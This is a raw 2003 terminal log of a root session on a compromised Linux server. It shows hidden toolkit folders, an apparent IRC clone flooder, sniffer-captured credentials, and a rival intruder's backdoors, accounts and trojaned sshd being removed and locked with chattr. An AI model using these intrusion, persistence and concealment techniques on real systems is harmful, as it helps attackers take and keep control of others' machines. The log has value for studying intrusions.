MiG-99
BOPOH
krash
whiskey
erixon
CHainGone
Dracon
Engerim
Vrgnie
Dolfi
koopal
bluebus
Alphaa
quattro76
gr8ron
custodes
Meph
AlterEgo
Mordeshur
emmi
SeaLink
H_lios
mrBLOM
Vader
gUFoao597
tMHd
Hug0
mu
Mikko
Tero
herbiez
KuPPa69
juhas
CountZero
kilroi-
aPeq
kilroi
s0rk_
di-tal
corVONero
Uoff
cleX
sLASh
CooperS
Littleboy
ra
reflect
chriz
gerhard
marco77
luarbiasa
JJ_
boy83
bobi3
sexbolek
ken1
ROB_
mrxx
brio
kikii
ktx
kamiLeon_
Shortys
Mr_Bate
KaViee
ASSSA
to
MonkeyBoy
OMEGA666
kewin___
klimas
[jazz]
Janet
gizmo
Abyss
saalut
blacky
HongKong
BlondeNor
sand`
yasin23
LoneWolf6
Jason_
[FunnY]
free19m
M_A_X
Colin-
rigo_
nino
Skru
Ivan21
MrBeauty
wow
daw3
Spirtouli
McAlcota
maurino2
Girlie16
vajje
Rix
Carlo_To
Mike19
Dimka_m
Rick
MyBoy
Jockey
SexyMan22
eGGiST^2
Mike^22
Ron26Wrl
ranu
hayes
Linda__
Anna
Kikeli
Spanker
yang
julze
RikuxR
Kliimax-
Viagara`
Gili
Condoom-
Pessaar-
Roku_
Rikuta-
Tampone-
Hallas-
MaCe|sg0l
aint|here
James--
Hammer
GoLd|3
afk-demon
syNc|pHos
bast_
VerTie^
P0_Zzzz
Madd
Mark
richard
Vaismi
MikaV
P-PER
lph
Poesje
XzOnE
TheS4int
iban3z
sidewalk_
Psychosis`
shred
Raistl`n
ph00re
Lunatic
TheFox
poison`
JaimeAFK
x0x0x
ceman^mP
CREAD`
FiRe|away
GAmppy
musc__
MRtaBizy
Ch0ck
snIke
pszaah
MaCe|sg0l
dangelo
keung
PsY^iDLe
mal0r
jornx
ibanez
Yakz0r
MikemcgiI
Perroz
PRIMERA
Cintat
Switch
Pinball
illusi0ns
melinda
clarissa
timer
Cracker
Utopia
]0;root@pc11: /usr/bin/.tux/tools/ecmf[root@pc11 ecmf]# ls
id         mf         mirkforce  nicks2
idents     mfclean    nicks      realnames
]0;root@pc11: /usr/bin/.tux/tools/ecmf[root@pc11 ecmf]# ./id
]0;root@pc11: /usr/bin/.tux/tools/ecmf[root@pc11 ecmf]# . ps
  PID   TTY   STAT  TIME COMMAND
  928   1     S    0:00 /sbin/mingetty tty1 
  929   2     S    0:00 /sbin/mingetty tty2 
  930   3     S    0:00 /sbin/mingetty tty3 
  931   4     S    0:00 /sbin/mingetty tty4 
  935   5     S    0:00 /sbin/mingetty tty5 
  936   6     S    0:00 /sbin/mingetty tty6 
20635  ?      S    0:00 -tcsh 
20662  ?      S    0:00 /sbin/bash 
20664  p2     S    0:00 /bin/bash 
21030  p2     R    0:00 ps 
]0;root@pc11: /usr/bin/.tux/tools/ecmf[root@pc11 ecmf]# ./mirkforce~
bash: ./mirkforce~: No such file or directory
]0;root@pc11: /usr/bin/.tux/tools/ecmf[root@pc11 ecmf]#  ./mirkforce
rand0m seed from /dev/urandom: -1415677926
Found nickz file. index: 26
Found identz file. index: 85
Found realnamez file. index: 21
Your IPaddr: 192.168.20.1 (eth0)
Checking 192.168.20.*
[
*]

...hErE c0m3z tHa lEEtfOrCe! (riding 252 IPz)
*Cleaning up...
SIOCSIFADDR: File exists
*** err0r when cleaning up, msg programmer :>
]0;root@pc11: /usr/bin/.tux/tools/ecmf[root@pc11 ecmf]# 
]0;root@pc11: /usr/bin/.tux/tools/ecmf[root@pc11 ecmf]# 
]0;root@pc11: /usr/bin/.tux/tools/ecmf[root@pc11 ecmf]# 
]0;root@pc11: /usr/bin/.tux/tools/ecmf[root@pc11 ecmf]# ls
id         mf         mirkforce  nicks2
idents     mfclean    nicks      realnames
]0;root@pc11: /usr/bin/.tux/tools/ecmf[root@pc11 ecmf]# exit

Back at local tty.
end at Mon Jun 16 04:54:55 HKT 2003
----------------------------------


Mon Jun 16 05:34:51 HKT 2003
================================

Connected to ttyp2 snoop server...
Ctrl+'\' (ASCII 28) to suspend, Ctrl+'-' (ASCII 31) to terminate.
w
  4:31am  up 12 days, 13:21,  0 users,  load average: 0.00, 0.00, 0.04
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
]0;root@pc11: /root[root@pc11 /root]# cd /etc./  /nmh/...
]0;root@pc11: /etc/nmh/...[root@pc11 ...]# ./read tcp.log  
Mon Jun 16 04:31:25 HKT 2003
----------------------------------------------------------------------
[ 21]   pc11                        anonymous@ftp.microsoft.com abc@126.com
[ 23]   pc11                        Fracktal        bluebird
[ 23]   pc11                        inge2           
[ 23]   pc11                        inge2           P
[ 23]   pc11                        inge3           unset HISTFILE
[ 23]   pc11                        inge3           unset HISTFInset HISTFILE
[ 23]   pc11                        !operator       bluebird
[ 23]   pc11                        operator        Fracktal
[ 23]   pc11                        opratore        bluebird
[ 23]   pc11                        Pinge           
----------------------------------------------------------------------
Mon Jun 16 04:31:25 HKT 2003
-------------------------------------------------------------------EOF
]0;root@pc11: /etc/nmh/...[root@pc11 ...]# userdel operator
]0;root@pc11: /etc/nmh/...[root@pc11 ...]# userdel Fracktal
]0;root@pc11: /etc/nmh/...[root@pc11 ...]# ps fax
  PID   TTY   STAT  TIME COMMAND
    1  ?      S    0:05 init [3]  
    2  ?      SW   0:00 [keventd]
    3  ?      SW   0:00 [kapm-idled]
    4  ?      SW   0:04 [kswapd]
    5  ?      SW   0:00 [kreclaimd]
    6  ?      SW   0:00 [bdflush]
    7  ?      SW   0:01 [kupdated]
    8  ?      SW<  0:00 [mdrecoveryd]
  175  ?      S    0:22 write 
  179  ?      S    0:01 java 
21151  ?      S    0:00  \_ java 
21153  ?      S    0:00      \_ -tcsh 
21180  ?      S    0:00          \_ /sbin/bash 
21182  p2     S    0:00              \_ /bin/bash 
21269  p2     R    0:00                  \_ ps fax 
  181  ?      S    0:20 write 
  197  ?      S    0:19 write 
  634  ?      S    0:00 /usr/sbin/apmd -p 10 -w 5 -W -P /etc/sysconfig/apm-scri
  691  ?      S    0:00 /usr/sbin/automount --timeout 60 /misc file /etc/auto.m
  771  ?      S    0:00 xinetd -reuse -pidfile /var/run/xinetd.pid 
28739  ?      S N  0:00  \_ //bin/sh 
  903  ?      S    0:42 /usr/sbin/mysqld 
21216  ?      S    0:00  \_ /usr/sbin/mysqld 
  926  ?      S    0:20 write 
  928   1     S    0:00 /sbin/mingetty tty1 
  929   2     S    0:00 /sbin/mingetty tty2 
  930   3     S    0:00 /sbin/mingetty tty3 
  931   4     S    0:00 /sbin/mingetty tty4 
  935   5     S    0:00 /sbin/mingetty tty5 
  936   6     S    0:00 /sbin/mingetty tty6 
  975  ?      S    0:00 mkdir tmp 
 2987  ?      R N  0:05 write 
 3129  ?      R N  0:05 write 
 3917  ?      R N  0:05 write 
 4061  ?      R N  0:03 write 
 4098  ?      S    0:07 write 
 7990  ?      S    1:52 ./fam 
 8028  ?      S    0:00 smbd -D 
17090  ?      S    0:00 sh -c "(swapd)" & 
17099  ?      T    0:00  \_ /sbin/modprobe -s -k -- binfmt-0000 
17100  ?      Z    0:00      \_ [modprobe ]
20938  ?      S    0:00 xinetd -reuse -pidfile /var/run/xinetd.pid 
21138  ?      S    0:00 syslogd -m 0 
21148  ?      S    0:00 klogd -2 
21242  ?      R    0:50 /bin/mingetty ttyp2 
21243  ?      S    0:00 /bin/number_cum -w 1 data1.dat 0012 
 2992  ?      S N  0:00 portmap 
]0;root@pc11: /etc/nmh/...[root@pc11 ...]# cd curatare/
]0;root@pc11: /etc/nmh/.../curatare[root@pc11 curatare]# ./ps fax
  PID TTY      STAT   TIME COMMAND
    1 ?        S      0:05 init [3] 
    2 ?        SW     0:00 [keventd]
    3 ?        SW     0:00 [kapm-idled]
    4 ?        SW     0:04 [kswapd]
    5 ?        SW     0:00 [kreclaimd]
    6 ?        SW     0:00 [bdflush]
    7 ?        SW     0:01 [kupdated]
    8 ?        SW<    0:00 [mdrecoveryd]
  175 ?        S      0:22 write
  179 ?        S      0:01 java
21151 ?        S      0:00  \_ java
21153 pts/1    S      0:00      \_ -tcsh
21180 pts/1    S      0:00          \_ /sbin/bash
21182 ttyp2    S      0:00              \_ /bin/bash
21270 ttyp2    R      0:00                  \_ ./ps fax
  181 ?        S      0:20 write
  197 ?        S      0:19 write
  634 ?        S      0:00 /usr/sbin/apmd -p 10 -w 5 -W -P /etc/sysconfig/apm-sc
  691 ?        S      0:00 /usr/sbin/automount --timeout 60 /misc file /etc/auto
  771 ?        S      0:00 xinetd -reuse -pidfile /var/run/xinetd.pid
28739 ?        SN     0:00  \_ //bin/sh
  903 ?        S      0:42 /usr/sbin/mysqld
21216 ?        S      0:00  \_ /usr/sbin/mysqld
  926 ?        S      0:20 write
  928 tty1     S      0:00 /sbin/mingetty tty1
  929 tty2     S      0:00 /sbin/mingetty tty2
  930 tty3     S      0:00 /sbin/mingetty tty3
  931 tty4     S      0:00 /sbin/mingetty tty4
  935 tty5     S      0:00 /sbin/mingetty tty5
  936 tty6     S      0:00 /sbin/mingetty tty6
  975 ?        S      0:00 mkdir tmp
 7990 ?        S      1:52 ./fam
 8028 ?        S      0:00 smbd -D
17090 ?        S      0:00 sh -c "(swapd)" &
17099 ?        T      0:00  \_ /sbin/modprobe -s -k -- binfmt-0000
17100 ?        Z      0:00      \_ [modprobe ]
20926 ?        S      0:00 sendmail: accepting connections on port 25           
20930 ?        S      0:01 sshd -q -p 2000 -f /etc/ssh/sshd_config
20938 ?        S      0:00 xinetd -reuse -pidfile /var/run/xinetd.pid
 2987 ?        SN     0:05 write
 2992 ?        SN     0:00 portmap
 3129 ?        SN     0:05 write
 3917 ?        SN     0:05 write
 4061 ?        SN     0:03 write
 4098 ?        S      0:07 write
21138 ?        S      0:00 syslogd -m 0
21148 ?        S      0:00 klogd -2
21242 ?        R      1:02 /bin/mingetty ttyp2
21243 ?        S      0:00 /bin/number_cum -w 1 data1.dat 0012
]0;root@pc11: /etc/nmh/.../curatare[root@pc11 curatare]# kill -9 20930
]0;root@pc11: /etc/nmh/.../curatare[root@pc11 curatare]# killall -9 -vq sshd
]0;root@pc11: /etc/nmh/.../curatare[root@pc11 curatare]# ls -la /proc/*/exe
ls: /proc/17100/exe: No such file or directory
ls: /proc/2/exe: No such file or directory
ls: /proc/3/exe: No such file or directory
ls: /proc/4/exe: No such file or directory
ls: /proc/5/exe: No such file or directory
ls: /proc/6/exe: No such file or directory
ls: /proc/7/exe: No such file or directory
ls: /proc/8/exe: No such file or directory
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/1/exe -> /sbin/init
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/17090/exe -> /bin/bash
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/17099/exe -> /sbin/insmod
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/17100/exe
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/175/exe -> /usr/bin/.tux/tools/sniffer/write
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/179/exe -> /usr/bin/java
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/181/exe -> /usr/bin/.configuration/.. /write
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/197/exe -> /etc/nmh/.../write
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/2/exe
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/20926/exe -> /usr/local/sbin/sshd
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/20938/exe -> /usr/sbin/xinetd
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/21138/exe -> /sbin/syslogd
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/21148/exe -> /sbin/klogd
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/21151/exe -> /usr/bin/java
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/21153/exe -> /bin/tcsh
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/21180/exe -> /sbin/bash
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/21182/exe -> /bin/bash
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/21216/exe -> /usr/sbin/mysqld
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/21242/exe -> /bin/mingetty
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/21243/exe -> /bin/number_cum
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/28739/exe -> /bin/bash
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/2987/exe -> /usr/lib/conf/write
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/2992/exe -> /sbin/portmap
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/3/exe
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/3129/exe -> /usr/bin/.tux/tools/sniffer/write
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/3917/exe -> /usr/lib/conf/write
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/4/exe
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/4061/exe -> /usr/bin/.tux/tools/sniffer/write
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/4098/exe -> /usr/lib/conf/write
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/5/exe
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/6/exe
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/634/exe -> /usr/sbin/apmd
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/691/exe -> /usr/sbin/automount
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/7/exe
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/771/exe -> /usr/sbin/xinetd
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/7990/exe -> /usr/bin/.tux/tools/psybnc/fam
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/8/exe
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/8028/exe -> /usr/bin/smbd -D
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/903/exe -> /usr/sbin/mysqld
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/926/exe -> /usr/bin/.tux/tools/sniffer/write
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/928/exe -> /sbin/mingetty
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/929/exe -> /sbin/mingetty
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/930/exe -> /sbin/mingetty
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/931/exe -> /sbin/mingetty
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/935/exe -> /sbin/mingetty
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/936/exe -> /sbin/mingetty
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/975/exe -> /bin/mkdir
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/self/exe -> /bin/ls
]0;root@pc11: /etc/nmh/.../curatare[root@pc11 curatare]# kill    cd /usr/lib/conf/write\ 
bash: cd: /usr/lib/conf/write: Not a directory
]0;root@pc11: /etc/nmh/.../curatare[root@pc11 curatare]# cd /usr/lib/conf/write      
]0;root@pc11: /usr/lib/conf[root@pc11 conf]# ls
curatare  read      write
]0;root@pc11: /usr/lib/conf[root@pc11 conf]# cd ..
]0;root@pc11: /usr/lib[root@pc11 lib]# cd ..
]0;root@pc11: /usr[root@pc11 /usr]# cd 
]0;root@pc11: /root[root@pc11 /root]# rm -rf /usr/lib/conf/write
]0;root@pc11: /root[root@pc11 /root]# /usr/lib/conf/write     
bash: /usr/lib/conf/: is a directory
]0;root@pc11: /root[root@pc11 /root]# rm -rf /usr/lib/conf/
]0;root@pc11: /root[root@pc11 /root]# rm -rf /usr/local/sbin/sshd
rm: cannot unlink `/usr/local/sbin/sshd': Operation not permitted
]0;root@pc11: /root[root@pc11 /root]# chattr -saui /usr/local/sbin/sshd
]0;root@pc11: /root[root@pc11 /root]# rm -rf /usr/local/sbin/sshd
]0;root@pc11: /root[root@pc11 /root]# touch /usr/local/sbin/sshd
]0;root@pc11: /root[root@pc11 /root]# chattr +saui /usr/local/sbin/sshd
]0;root@pc11: /root[root@pc11 /root]# cd /etc/    usr/n bin/.tux/tools
]0;root@pc11: /usr/bin/.tux/tools[root@pc11 tools]# ./socklist 
type  port      inode     uid    pid   fd  name
tcp    513       1303       0    771    7  xinetd
tcp    514       1302       0    771    6  xinetd
tcp    995       1304       0    771    8  xinetd
tcp   3306       1579       0    903    3  mysqld
tcp    555     124160       0  20926   21  sshd
tcp   6668      94672       0   7990    9  fam
tcp    111     194193       0   2992   15  portmap
tcp    143       1305       0    771    9  xinetd
tcp  10003      94807       0   8028   13  smbd
tcp     21       1299       0    771    3  xinetd
tcp     23       1301       0    771    5  xinetd
tcp    120        337       0    179    4  java
tcp   6010     276143       0  21216    3  mysqld
tcp   1048     276206       0  21243    5  number_cum
tcp   1053     277849       0   7990   14  fam
tcp    120     276016       0  21151    3  java
tcp   6668     277348       0   7990   18  fam
tcp   3306     276138       0  21216    4  mysqld
tcp     21     163664       0  28739    1  sh
tcp   4283     263750       0   7990   15  fam
tcp     21     186128       0   4061    1  write
tcp   4279     263726       0   7990   16  fam
udp    514     275846       0  21138    6  syslogd
udp     69     124237       0  20938    3  xinetd
udp     69       1300       0    771    4  xinetd
udp   3049       2106       0    975    5  mkdir
udp    111     194178       0   2992   14  portmap
]0;root@pc11: /usr/bin/.tux/tools[root@pc11 tools]# killall -9 -vq sshd
]0;root@pc11: /usr/bin/.tux/tools[root@pc11 tools]# ./socklist 
type  port      inode     uid    pid   fd  name
tcp    513       1303       0    771    7  xinetd
tcp    514       1302       0    771    6  xinetd
tcp    995       1304       0    771    8  xinetd
tcp   3306       1579       0    903    3  mysqld
tcp    555     124160       0  20926   21  sshd
tcp   6668      94672       0   7990    9  fam
tcp    111     194193       0   2992   15  portmap
tcp    143       1305       0    771    9  xinetd
tcp  10003      94807       0   8028   13  smbd
tcp     21       1299       0    771    3  xinetd
tcp     23       1301       0    771    5  xinetd
tcp    120        337       0    179    4  java
tcp   6010     276143       0  21216    3  mysqld
tcp   1048     276206       0  21243    5  number_cum
tcp   1053     277849       0   7990   14  fam
tcp    120     276016       0  21151    3  java
tcp   6668     277348       0   7990   18  fam
tcp   3306     276138       0  21216    4  mysqld
tcp     21     163664       0  28739    1  sh
tcp   4283     263750       0   7990   15  fam
tcp     21     186128       0   4061    1  write
tcp   4279     263726       0   7990   16  fam
udp    514     275846       0  21138    6  syslogd
udp     69     124237       0  20938    3  xinetd
udp     69       1300       0    771    4  xinetd
udp   3049       2106       0    975    5  mkdir
udp    111     194178       0   2992   14  portmap
]0;root@pc11: /usr/bin/.tux/tools[root@pc11 tools]# kill -9 20926
]0;root@pc11: /usr/bin/.tux/tools[root@pc11 tools]# kill -9 20926./socklist 
type  port      inode     uid    pid   fd  name
tcp    513       1303       0    771    7  xinetd
tcp    514       1302       0    771    6  xinetd
tcp    995       1304       0    771    8  xinetd
tcp   3306       1579       0    903    3  mysqld
tcp   6668      94672       0   7990    9  fam
tcp    111     194193       0   2992   15  portmap
tcp    143       1305       0    771    9  xinetd
tcp  10003      94807       0   8028   13  smbd
tcp     21       1299       0    771    3  xinetd
tcp     23       1301       0    771    5  xinetd
tcp    120        337       0    179    4  java
tcp   6010     276143       0  21216    3  mysqld
tcp   1048     276206       0  21243    5  number_cum
tcp    120     276016       0  21151    3  java
tcp   6668     277348       0   7990   18  fam
tcp   3306     276138       0  21216    4  mysqld
tcp     21     163664       0  28739    1  sh
tcp   4283     263750       0   7990   15  fam
tcp     21     186128       0   4061    1  write
tcp   4279     263726       0   7990   16  fam
udp    514     275846       0  21138    6  syslogd
udp     69     124237       0  20938    3  xinetd
udp     69       1300       0    771    4  xinetd
udp   3049       2106       0    975    5  mkdir
udp    111     194178       0   2992   14  portmap
]0;root@pc11: /usr/bin/.tux/tools[root@pc11 tools]# ls
bitchx         firewall       sniffer        ssh
ecmf           firewall.tgz   socklist       synscan
exploits       psymicutz.tgz  socklist.tgz   utils
]0;root@pc11: /usr/bin/.tux/tools[root@pc11 tools]# cd firewall
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# \./close 
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# ./close 555
Firewall rulez
Presented by Fracktal
Fracktal@fracktal.us
(C) 06-10-2002

Closing port 555... done.
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# ./close 555   cd firewall
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# 
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# ./close 10003
Firewall rulez
Presented by Fracktal
Fracktal@fracktal.us
(C) 06-10-2002

Closing port 10003... done.
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# killall -9 -vq smbd
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# killall -9 -vq smbd
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# killall -9 -vq smbd
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# telnet localhost 10003
Trying 127.0.0.1...

]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# telnet localhost 10003       120
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
SSH-1.5-1.2.27

Connection closed by foreign host.
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# 
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# 
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# 
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# 
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# 
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# 
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# 
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# 
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# 
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# cd ..
]0;root@pc11: /usr/bin/.tux/tools[root@pc11 tools]# ls
bitchx         firewall       sniffer        ssh
ecmf           firewall.tgz   socklist       synscan
exploits       psymicutz.tgz  socklist.tgz   utils
]0;root@pc11: /usr/bin/.tux/tools[root@pc11 tools]# cd psybnc
]0;root@pc11: /usr/bin/.tux/tools/psybnc[root@pc11 psybnc]# cat psybnc.pid
7990
]0;root@pc11: /usr/bin/.tux/tools/psybnc[root@pc11 psybnc]# kill -9 7990
]0;root@pc11: /usr/bin/.tux/tools/psybnc[root@pc11 psybnc]# pico psybnc.conf